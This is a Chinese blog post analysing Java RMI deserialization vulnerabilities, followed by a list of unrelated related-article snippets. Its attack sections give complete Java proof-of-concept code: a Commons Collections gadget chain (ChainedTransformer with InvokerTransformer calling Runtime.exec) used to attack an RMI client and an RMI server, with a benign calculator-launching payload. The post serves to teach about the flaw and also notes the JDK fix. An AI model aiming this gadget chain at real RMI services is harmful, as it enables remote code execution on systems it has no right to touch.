LittleT1gger
LittleT1gger

RMI反序列化漏洞分析

1、RMI是什么

RMI(Remote Method Invocatio),是一种跨JVM实现方法调用的技术。一般由三个部分组成

  • Client(客户端) Registry取得服务端注册的服务,然后调用远程方法

    // Connect to RMI Registry :localhost:1099
Registry registry = LocateRegistry.getRegistry("localhost", 1099);

// search service which called evil and cast type to EvilService
EvilService evilService = (EvilService) registry.lookup("evil");

//call evil method and need to call "put" function to trigger
//evilTransformerMap方法具体的执行逻辑是在服务端执行的,并返回结果给client
Map evilObject = (Map)evilService.evilTransformerMap();

  • Registry(注册中心) 可以理解成一个存储远程对象的字典,负责网络传输的模块

  • Server(服务端) 负责在注册中心注册服务,其实就是将一个远程对象给Registry进行封装

    //实例化一个EvilService 即要绑定的对象
EvilService evilService = new EvilServiceImpl();
// 将此服务转换为远程服务接口
EvilService skeleton = (EvilService) UnicastRemoteObject.exportObject(evilService,0);
//创建注册中心
Registry registry = LocateRegistry.createRegistry(1099);
//将服务注册
registry.bind("evil",skeleton);

PS:在低版本的JDK中,ServerRegistry是可以不在一台服务器上的,而在高版本的JDK中,ServerRegistry只能在一台服务器上,否则无法注册成功。

2、服务端或服务端与注册中心通信

2.1 本地获取注册中心

本地获取是在创建的同时返回Registry对象(RegistryImpl)通过createRegistry 方法如:

Registry registry = LocateRegistry.createRegistry(1099);

获取对象后可以进行bind,list,lookup,rebind,unbind等操作

2.2 远程获取注册中心

通过getRegistry方法获得的对象是RegistryImpl_Stub对象而createRegistry获得的是RegistryImpl对象。

Registry registry = LocateRegistry.getRegistry("localhost", 1099);

这两者的区别在于在对Registry进行操作的时候流程会有不同,有兴趣的同学可以尝试打断点进行调试查看具体区别

2.3 客户端与服务端的通信

这里主要讲一下会引发反序列化的环节

当客户端发起调用远程方法的时候,实际上是客户端与2.4中的Skeleton进行通信,而如果返回客户端的执行结果是一个对象,则在客户端会对其进行反序列化

而当服务端接收的某个参数类型是Object的时候,则会出现在服务端反序列化的情况。

2.4 流程图

image.png

3、反序列化攻击

3.1 攻击Registry

注册中心直接利用bindrebind即可攻击这里不再赘述了

3.2 攻击Client

EvilObject

public class EvilServiceImpl implements EvilService {
    public EvilServiceImpl(){
    }

    public Transformer gadgetTransformerChain(){
        Transformer transformerChain = null;
        try {
            transformerChain = new ChainedTransformer(new Transformer[]{
                    new ConstantTransformer(Runtime.class),
                    new InvokerTransformer("getMethod", new Class[]{
                            String.class, Class[].class}, new Object[]{
                            "getRuntime", new Class[0]}),
                    new InvokerTransformer("invoke", new Class[]{
                            Object.class, Object[].class}, new Object[]{
                            null, new Object[0]}),
                    new InvokerTransformer("exec",
                            new Class[]{String.class}, new Object[]{"open  /System/Applications/Calculator.app"})});
        }catch (Exception e){
            e.printStackTrace();
        }
        return transformerChain;
    }
    public Object evilTransformerMap() throws RemoteException {
        //转化为map
        Map outputMap = TransformedMap.decorate(new HashMap<>(),null,gadgetTransformerChain());
        return outputMap;
    }
}

Server

public class RMIServer {
    public static void main(String[] args) {
        try {
            //实例化一个EvilService
            EvilService evilService = new EvilServiceImpl();
            // 将此服务转换为远程服务接口
            EvilService skeleton = (EvilService) UnicastRemoteObject.exportObject(evilService,0);
            Registry registry = LocateRegistry.createRegistry(1099);
            registry.bind("evil",skeleton);
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

Client

public class RMIClient {
    public static void main(String[] args) throws Exception {
        // Connect to RMI Registry :localhost:1099
        Registry registry = LocateRegistry.getRegistry("localhost", 1099);
        // search service which called evil and cast type to EvilService
        EvilService evilService = (EvilService) registry.lookup("evil");

        //call evil method and need to call "put" function to trigger
        //deserialize will happen when function evilTransformerMap() is called
        Map evilObject = (Map)evilService.evilTransformerMap();

        evilObject.put("1","111");
    }
}

3.3 攻击Server

大体上没什么变化只是evilObject的发送方产生了变化

RMIClient

public class RMIClient {
    public static void main(String[] args) throws Exception {
        Transformer transformerChain = new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
                        String.class, Class[].class}, new Object[]{
                        "getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{
                        Object.class, Object[].class}, new Object[]{
                        null, new Object[0]}),
                new InvokerTransformer("exec",
                        new Class[]{String.class}, new Object[]{"open  /System/Applications/Calculator.app"})});
        Map outputMap = TransformedMap.decorate(new HashMap<>(),null,transformerChain);

        // Connect to RMI Registry :localhost:1099
        Registry registry = LocateRegistry.getRegistry("localhost", 1099);

        Service service = (Service) registry.lookup("evil");
        //触发服务端反序列化
        service.evil(outputMap);
    }
}

ServiceImpl

public class ServiceImpl implements Service {
    public ServiceImpl(){

    }
    @Override
    public void evil(Object evilObject) throws RemoteException {
        ((Map) evilObject).put("1","111");
    }
}

4、修复

1、在高版本的jdk(8u141)中,RegistryImpl#bind中添加了一个checkAccess方法,来检验你的来源是否为localhost ,这个修复解决了攻击注册中心的问题

你可能感兴趣的:(RMI反序列化漏洞分析)

  • docker 镜像和容器操作 IT届程序猿 Docker
    镜像相关:检索dockersearch关键字eg:dockersearchredis我们经常去dockerhub上检索镜像的详细信息,如镜像的TAG。拉取dockerpull镜像名:tag:tag是可选的,tag表示标签,多为软件的版本,默认是latest列表dockerimages查看所有本地镜像删除dockerrmiimage-id删除指定的本地镜像容器相关:1、搜索镜像[root@local
  • Docker镜像、容器操作 左左张 linuxdockerlinux
    Docker镜像、容器操作2018-8-20镜像操作查看镜像dockerimages保存镜像dockersavemyimage-o/home/zzz/docker/myimage.tar载入镜像dockerload
  • Oracle11g下载与安装(windows) pingcode JAVA全栈开发笔记(全)JAVA前后端开发笔记oracle
    一、Oracle11g下载官网下载地址:OracleDatabase11gRelease2forMicrosoftWindows(x64)选择"AcceptLicenseAgreement",点击"win64_11gR2_database_1of2.zip"和"win64_11gR2_database_2of2.zip",进行下载。(下载前需登录Oracle账号,没有的话可以用邮箱注册一个,登录之
  • 【转载】Spring Cloud Alibaba文档 Hatakefiftyfifty Spring家族-SpringCloudspringcloudjava微服务
    IntroductionSpringCloudAlibabaaimstoprovideaone-stopsolutionformicroservicesdevelopment.Thisprjoectincludestherequiredcomponentsfordevelopingdistributedapplicationsandservices,sothatdeveloperscandevel
  • 如何激活python的虚拟环境 怪咖学生 python开发语言
    要激活Python的虚拟环境,首先需要确保你已经创建了一个虚拟环境。假设你已经在项目目录中创建了一个虚拟环境,名为venv。以下是激活虚拟环境的步骤:在Windows上:打开命令提示符(CommandPrompt)。导航到包含虚拟环境的目录。输入以下命令激活虚拟环境:.\venv\Scripts\activate在macOS或Linux上:打开终端(Terminal)。导航到包含虚拟环境的目录。输
  • Windows 远程桌面 RDP 会话超时设置 TechExplorer365 Toolwindows
    Windows远程桌面RDP会话超时设置Windows远程桌面(RDP)可能由于会话超时而导致重新要求登录。你可以通过修改注册表或组策略来延长远程桌面的会话超时时间。修改注册表:打开注册表编辑器(regedit)。导航到以下路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer找到IdleTimeoutSecs键(
  • java FastJSON自定义序列化和反序列化(扩展点)方法总结!10个步骤让你轻松掌握 墨瑾轩 一起学学Java【一】开发语言java
    关注墨瑾轩,带你探索编程的奥秘!超萌技术攻略,轻松晋级编程高手技术宝库已备好,就等你来挖掘订阅墨瑾轩,智趣学习不孤单即刻启航,编程之旅更有趣嘿,小伙伴们!今天我们要一起探讨一个非常实用的话题——如何使用FastJSON自定义序列化和反序列化。你知道吗?FastJSON是阿里巴巴开源的一个高性能JSON库,广泛应用于Java项目中。虽然FastJSON提供了丰富的内置功能,但有时候我们还需要根据具体
  • PostgreSQL 常用运维SQL整理 尚雷_TechTalk01 PostgreSQLpostgresql运维sql
    一、查询并杀会话--查询会话selectpid,usename,client_addr,client_port,query_start,query,wait_eventfrompg_stat_activity;--杀会话selectpg_terminate_backend('pid号');--使用如下命令自动生成杀会话语句selectdatid,datname,pid,usesysid,usena
  • Transformer代码怎么写?原理一听就懂,代码一写就废!分享我从理解原理到实际编写代码的转换秘籍 夜信431 transformer深度学习人工智能
    这个困惑非常典型,这正是从"理解者"到"创造者"的关键跃迁阶段。让我们用建造房子的比喻,结合具体代码实例,拆解这个转化过程:示例代码(已加注释):importosimportplatformimporttimeimportmathimportwarningsimporttorchimporttorch.distributedasdistfromtorchimportoptimfromtorch.n
  • IDEA 的内置终端,设置成打开CMD 而不是powershell 汉献帝刘协 intellij-ideajavaide
    如果您想在IntelliJIDEA中使用cmd而不是powershell作为终端,您可以按照以下步骤进行设置:打开IDEA的设置(快捷键:Ctrl+Alt+S),进入Tools,再进入Terminal。在Shellpath那一栏中,输入或选择C:\Windows\System32\cmd.exe,这是cmd的默认路径。点击Apply和OK,保存您的更改。重新打开或切换到Terminal,您就可以看
  • 记录一个Jetbrains家族的IDE的Terminal环境变量问题 互联网速递520 ide
    问题描述在JetBrains家族的IDE的Terminal中,定义环境变量A的时候,无法引用环境变量B,否则会导致打开Terminal的时候环境变量失效,比如:FOO=C:\binPATH=%FOO%;%PATH%打开终端之后,PATH环境变量会彻底无效,并不能展开系统原来的PATH环境变量并在其前面添加C:\bin问题追踪咱也是做软件的,想来想去这个功能实现也不复杂,打开终端之前,取得所有环境变
  • DeepSeek:LLM在MoE训练中的无损平衡 大模型任我行 大模型-模型训练人工智能自然语言处理语言模型论文笔记
    标题:AUXILIARY-LOSS-FREELOADBALANCINGSTRAT-EGYFORMIXTURE-OF-EXPERTS来源:arXiv,2408.15664摘要对于混合专家(MoE)模型,不平衡的专家负载将导致路由崩溃或计算开销增加。现有方法通常采用辅助损耗来促进负载平衡,但较大的辅助损耗会在训练中引入不可忽略的干扰梯度,从而损害模型性能。为了在训练过程中控制负载平衡,同时不产生不希望
  • Kafka(一)使用Docker Compose安装单机Kafka以及Kafka UI_docker 部署单机kafka 2401_84166396 2024年程序员学习kafkadockerui
    开启JMX监控JMX_PORT=9998KAFKA_JMX_OPTS=-Dcom.sun.management.jmxremote-Dcom.sun.management.jmxremote.authenticate=false-Dcom.sun.management.jmxremote.ssl=false-Djava.rmi.server.hostname=kafka-Dcom.sun.mana
  • python 多线程 无阻塞获取键盘按键 檐上走过的猫
    编程小白python多线程无阻塞获取键盘按键刚开始学,不喜勿喷,谢谢importsysimportttyimporttermiosimportosimportthreadingdefreadchar():fd=sys.stdin.fileno()old_settings=termios.tcgetattr(fd)try:tty.setraw(sys.stdin.fileno())ch=sys.st
  • 2018.9月Flutter优质开源项目 weixin_34408624 移动开发python
    2019独角兽企业重金招聘Python工程师标准>>>2018.9月Flutter优质开源项目转载于:https://my.oschina.net/coderminer/blog/2218697
  • Python——Pickle库 Devin01213
    pickle是python语言的一个标准模块,安装python后已包含pickle库,不需要单独再安装。那么为什么需要序列化和反序列化这一操作呢?1.便于存储。序列化过程将文本信息转变为二进制数据流。这样就信息就容易存储在硬盘之中,当需要读取文件的时候,从硬盘中读取数据,然后再将其反序列化便可以得到原始的数据。在Python程序运行中得到了一些字符串、列表、字典等数据,想要长久的保存下来,方便以后
  • python中的序列化 fate252 Pythonpython序列化picklejson
    序列化(picking)把不方便存储或不可传输的对象转换为可存储或可传输的数据的过程称之为序列化。序列化之后,就可以把序列化后的内容写入磁盘,或者通过网络传输到别的机器上。反过来,把从磁盘或网络得到的序列化数据重建为对象的过程称之为反序列化(unpickling)。序列化和反序列化实际是为了通用存储或传输而编码和解码的过程。举例:网络游戏mabi洛奇的存档功能,当每次不想玩的时候就可以存档到服务器
  • 利用 python 实现校园网自动登录 yyywxk #Python基础python开发语言
    背景利用python实现校园网自动登录通常涉及到模拟浏览器的行为,发送HTTP请求以完成登录过程。这需要你了解学校网络的登录机制,包括但不限于登录页面的URL、用户名和密码字段的名字、以及可能存在的验证码等。代码importrequestsimportscheduleimporttimeimportsubprocessimportplatformimportre#校园网登录的URL和需要的数据字段
  • js 实现递归替换多级数据中的键 猫九森 javascript前端vue.js
    functiontransformData(data:any){returndata.map((item:any)=>{consttransformedItem={//将原始数据也全部存储进去呀...item,key:item.permission_id,title:item.permission_name,//判断有没有子集如果有就重复调用children:item.children?trans
  • C语言扫雷解析 2401_86161528 minesweeperc语言
    我们从源码开始,分析整个游戏的运行过程全部代码请见【C语言扫雷-CSDNApp】minesweeper.c片段#include#include"minesweeper.h"#includecharShowMines[X][Y];charmine[X][Y];charMineNumber[X][Y];charsafe[X][Y];片段中引入了,根据时间可以随机生成雷的位置。下面是四个字符数组,x坐标
  • go 循环处理无限极数据 猫九森 后端go数据结构
    数据表结构:CREATETABLE`permission`(`id`int(11)NOTNULLAUTO_INCREMENTCOMMENT'权限ID',`permission_name`varchar(255)DEFAULTNULLCOMMENT'权限名称',`permission_url`varchar(255)DEFAULTNULLCOMMENT'权限路由',`status`tinyint(1
  • Java中String类型的字符串转换成JSON对象和JSON字符串 柳小同学 javajson
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录一、Java字符串String类型转换成Json对象二、序列化1.引入fastjson依赖2.序列化的使用三、反序列化1.引入fastjson依赖2.反序列化的使用一、Java字符串String类型转换成Json对象在开发中会遇到接收前端传入一个Json对象,然后Json对象里面又有一个字段是Json字符串,例如{"code"
  • 八股——Java基础(四) 八月五 面试题java
    目录一、泛型1.Java中的泛型是什么?2.使用泛型的好处是什么?3.Java泛型的原理是什么?什么是类型擦除?4.什么是泛型中的限定通配符和非限定通配符?5.List和List之间有什么区别?6.可以把List传递给一个接受List参数的方法吗?7.Array中可以用泛型吗?8.判断ArrayList与ArrayList是否相等?二、序列化1.Java序列化与反序列化是什么?2.为什么需要序列化
  • ctf python大法好_【技术分享】记CTF比赛中发现的Python反序列化漏洞 weixin_39631370 ctfpython大法好
    预估稿费:200RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发现了序列化漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列化对象的Python库,而我们通过研究发现,这些Python库中存在的安
  • debian12.9编译freeswitch1.10.12【默认安装】 狂爱代码的码农 VOIP那些事freeswitch
    服务器操作系统cat/etc/os-releasePRETTY_NAME="DebianGNU/Linux12(bookworm)"NAME="DebianGNU/Linux"VERSION_ID="12"VERSION="12(bookworm)"VERSION_CODENAME=bookwormID=debianHOME_URL="https://www.debian.org/"SUPPORT
  • ESP32-CAM导入ino项目编译和烧录 Android小码家 LinuxESP32
    文章目录ESP32Cam模式接线图导入ino项目选择INO打开目录结构手动转换成C++源代码编译效果图搞猛一点其他实验ESP32Cam模式接线图导入ino项目选择INO打开目录结构platformio.ini;PlatformIOProjectConfigurationFile;;Buildoptions:buildflags,sourcefilter;Uploadoptions:customup
  • PyQt4 的图片切割编辑器 烛火萤辉 Pythonpythonpyqt
    一、编辑器功能明确允许用户加载图片、选择切割模式、对切割后的图片片段进行操作(如移动、复制、粘贴、删除等),并支持撤销和重做操作。环境:Py2.7PyQt4.11二、导入模块介绍sys:用于访问与Python解释器强相关的变量和函数。os:提供操作系统相关功能,如文件路径操作。random:用于生成随机数,主要用于自动保存文件名。json:用于数据序列化和反序列化,方便保存和加载编辑状态。glob
  • ESP32-CAM实验集(WebServer) Android小码家 LinuxESP32
    WebServer效果图已连接web端platformio.ini;PlatformIOProjectConfigurationFile;;Buildoptions:buildflags,sourcefilter;Uploadoptions:customuploadport,speedandextraflags;Libraryoptions:dependencies,extralibrarysto
  • @JsonCreator 注解 huang_hai_an javaajaxjavascript
    @JsonCreator注解是Jackson库中用于指定如何从JSON数据创建Java对象实例的一个重要工具。它允许你定义一个静态方法(通常是构造函数或静态工厂方法),Jackson在反序列化时会调用这个方法来生成对象实例。@JsonCreator注解可以应用于方法、构造函数或注解类型,并且可以通过mode()属性指定不同的工作模式。@JsonCreator注解的组成部分@Target:指定该注解
  • 你们要的python圣诞树 坏柠 pythonpythonpycharm开发语言
    圣诞节要到了,不给对象画一颗圣诞树吗?那就用python画一颗圣诞树吧​#-*-codeing=utf-8-*-#@Time:2021/12/1410:35#@Author:1#@File:圣诞树.py.py#@Softestr:PyCharmimportturtleimporttimeimportrandomturtle.screensize(700,600,"thistle3")turtle.
  • 安装数据库首次应用 Array_06 javaoraclesql
    可是为什么再一次失败之后就变成直接跳过那个要求 enter full pathname of java.exe的界面 这个java.exe是你的Oracle 11g安装目录中例如:【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe! 注意第一次,使用SQL D
  • Weblogic Server Console密码修改和遗忘解决方法 bijian1013 Welogic
            在工作中一同事将Weblogic的console的密码忘记了,通过网上查询资料解决,实践整理了一下。 一.修改Console密码         打开weblogic控制台,安全领域 --> myrealm -->&n
  • IllegalStateException: Cannot forward a response that is already committed Cwind javaServlets
    对于初学者来说,一个常见的误解是:当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。 示例代码: protected void doPost() { if (someCondition) { sendRedirect(); } forward(); // Thi
  • 基于流的装饰设计模式 木zi_鸣 设计模式
    当想要对已有类的对象进行功能增强时,可以定义一个类,将已有对象传入,基于已有的功能,并提供加强功能。 自定义的类成为装饰类 模仿BufferedReader,对Reader进行包装,体现装饰设计模式 装饰类通常会通过构造方法接受被装饰的对象,并基于被装饰的对象功能,提供更强的功能。 装饰模式比继承灵活,避免继承臃肿,降低了类与类之间的关系 装饰类因为增强已有对象,具备的功能该
  • Linux中的uniq命令 被触发 linux
    Linux命令uniq的作用是过滤重复部分显示文件内容,这个命令读取输入文件,并比较相邻的行。在正常情 况下,第二个及以后更多个重复行将被删去,行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示,则从标准输入读取。 AD: uniq [选项] 文件 说明:这个命令读取输入文件,并比较相邻的行。在正常情况下,第二个
  • 正则表达式Pattern 肆无忌惮_ Pattern
    正则表达式是符合一定规则的表达式,用来专门操作字符串,对字符创进行匹配,切割,替换,获取。   例如,我们需要对QQ号码格式进行检验 规则是长度6~12位  不能0开头  只能是数字,我们可以一位一位进行比较,利用parseLong进行判断,或者是用正则表达式来匹配[1-9][0-9]{4,14} 或者 [1-9]\d{4,14} &nbs
  • Oracle高级查询之OVER (PARTITION BY ..) 知了ing oraclesql
    一、rank()/dense_rank() over(partition by ...order by ...) 现在客户有这样一个需求,查询每个部门工资最高的雇员的信息,相信有一定oracle应用知识的同学都能写出下面的SQL语句: select e.ename, e.job, e.sal, e.deptno from scott.emp e, (se
  • Python调试 矮蛋蛋 pythonpdb
    原文地址: http://blog.csdn.net/xuyuefei1988/article/details/19399137 1、下面网上收罗的资料初学者应该够用了,但对比IBM的Python 代码调试技巧: IBM:包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试: http://www.ibm.com/d
  • webservice传递自定义对象时函数为空,以及boolean不对应的问题 alleni123 webservice
    今天在客户端调用方法 NodeStatus status=iservice.getNodeStatus(). 结果NodeStatus的属性都是null。 进行debug之后,发现服务器端返回的确实是有值的对象。 后来发现原来是因为在客户端,NodeStatus的setter全部被我删除了。 本来是因为逻辑上不需要在客户端使用setter, 结果改了之后竟然不能获取带属性值的
  • java如何干掉指针,又如何巧妙的通过引用来操作指针————>说的就是java指针 百合不是茶
    C语言的强大在于可以直接操作指针的地址,通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大,初学者很难掌握, java的出现解决了c,c++中指针的问题 java将指针封装在底层,开发人员是不能够去操作指针的地址,但是可以通过引用来间接的操作:   定义一个指针p来指向a的地址(&是地址符号):        
  • Eclipse打不开,提示“An error has occurred.See the log file ***/.log” bijian1013 eclipse
    打开eclipse工作目录的\.metadata\.log文件,发现如下错误: !ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 !MESSAGE Application error !STACK 1 java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai
  • spring aop实例annotation方法实现 bijian1013 javaspringAOPannotation
            在spring aop实例中我们通过配置xml文件来实现AOP,这里学习使用annotation来实现,使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut AdviceMethods.jav
  • [Velocity一]Velocity语法基础入门 bit1129 velocity
    用户和开发人员参考文档 http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html   注释 1.行级注释## 2.多行注释#*  *#   变量定义 使用$开头的字符串是变量定义,例如$var1, $var2,   赋值 使用#set为变量赋值,例
  • 【Kafka十一】关于Kafka的副本管理 bit1129 kafka
    1. 关于request.required.acks   request.required.acks控制者Producer写请求的什么时候可以确认写成功,默认是0, 0表示即不进行确认即返回。 1表示Leader写成功即返回,此时还没有进行写数据同步到其它Follower Partition中 -1表示根据指定的最少Partition确认后才返回,这个在   Th
  • lua统计nginx内部变量数据 ronin47 lua nginx  统计
    server { listen 80; server_name photo.domain.com; location /{set $str $uri; content_by_lua ' local url = ngx.var.uri local res = ngx.location.capture(
  • java-11.二叉树中节点的最大距离 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class MaxLenInBinTree { /* a. 1 / \ 2 3 / \ / \ 4 5 6 7 max=4 pass "root"
  • Netty源码学习-ReadTimeoutHandler bylijinnan javanetty
    ReadTimeoutHandler的实现思路: 开启一个定时任务,如果在指定时间内没有接收到消息,则抛出ReadTimeoutException 这个异常的捕获,在开发中,交给跟在ReadTimeoutHandler后面的ChannelHandler,例如 private final ChannelHandler timeoutHandler = new ReadTim
  • jquery验证上传文件样式及大小(好用) cngolon 文件上传jquery验证
    <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script src="jquery1.8/jquery-1.8.0.
  • 浏览器兼容【转】 cuishikuan css浏览器IE
    浏览器兼容问题一:不同浏览器的标签默认的外补丁和内补丁不同 问题症状:随便写几个标签,不加样式控制的情况下,各自的margin 和padding差异较大。 碰到频率:100% 解决方案:CSS里    *{margin:0;padding:0;} 备注:这个是最常见的也是最易解决的一个浏览器兼容性问题,几乎所有的CSS文件开头都会用通配符*来设
  • Shell特殊变量:Shell $0, $#, $*, $@, $?, $$和命令行参数 daizj shell$#$?特殊变量
    前面已经讲到,变量名只能包含数字、字母和下划线,因为某些包含其他字符的变量有特殊含义,这样的变量被称为特殊变量。例如,$ 表示当前Shell进程的ID,即pid,看下面的代码: $echo $$ 运行结果 29949   特殊变量列表 变量 含义 $0 当前脚本的文件名 $n 传递给脚本或函数的参数。n 是一个数字,表示第几个参数。例如,第一个
  • 程序设计KISS 原则-------KEEP IT SIMPLE, STUPID! dcj3sjt126com unix
    翻到一本书,讲到编程一般原则是kiss:Keep It Simple, Stupid.对这个原则深有体会,其实不仅编程如此,而且系统架构也是如此。 KEEP IT SIMPLE, STUPID! 编写只做一件事情,并且要做好的程序;编写可以在一起工作的程序,编写处理文本流的程序,因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律,高明的工程师的神圣的“KISS 原
  • android Activity间List传值 dcj3sjt126com Activity
    第一个Activity: import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a
  • tomcat 设置java虚拟机内存 eksliang tomcat 内存设置
    转载请出自出处:http://eksliang.iteye.com/blog/2117772 http://eksliang.iteye.com/ 常见的内存溢出有以下两种: java.lang.OutOfMemoryError: PermGen space java.lang.OutOfMemoryError: Java heap space   ------------
  • Android 数据库事务处理 gqdy365 android
    使用SQLiteDatabase的beginTransaction()方法可以开启一个事务,程序执行到endTransaction() 方法时会检查事务的标志是否为成功,如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务,如果没有调用setTransactionSuccessful() 方法则回滚事务。事
  • Java 打开浏览器 hw1287789687 打开网址open浏览器open browser打开url打开浏览器
    使用java 语言如何打开浏览器呢? 我们先研究下在cmd窗口中,如何打开网址 使用IE 打开 D:\software\bin>cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 使用火狐打开 D:\software\bin>cmd /c start firefox http://hw1287789
  • ReplaceGoogleCDN:将 Google CDN 替换为国内的 Chrome 插件 justjavac chromeGooglegoogle apichrome插件
    Chrome Web Store 安装地址: https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 由于众所周知的原因,只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样,通过script标记引用这些资源,让网站访问速度瞬间提速吧
  • 进程VS.线程 m635674608 线程
    资料来源: http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点: 多进程模式最大
  • Linux下安装MemCached 字符串 memcached
    前提准备:1. MemCached目前最新版本为:1.4.22,可以从官网下载到。2. MemCached依赖libevent,因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令,查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n
  • java设计模式之--jdk动态代理(实现aop编程) Supanccy2013 javaDAO设计模式AOP
        与静态代理类对照的是动态代理类,动态代理类的字节码在程序运行时由Java反射机制动态生成,无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作,而且提高了软件系统的可扩展性,因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 &
  • Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持 wiselyman spring 4
    2.1 默认方法(default method) java8引入了一个default medthod; 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 使用default关键字 Spring 4.2支持加载在默认方法里声明的bean 2.2 将要被声明成bean的类 public class DemoService {
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他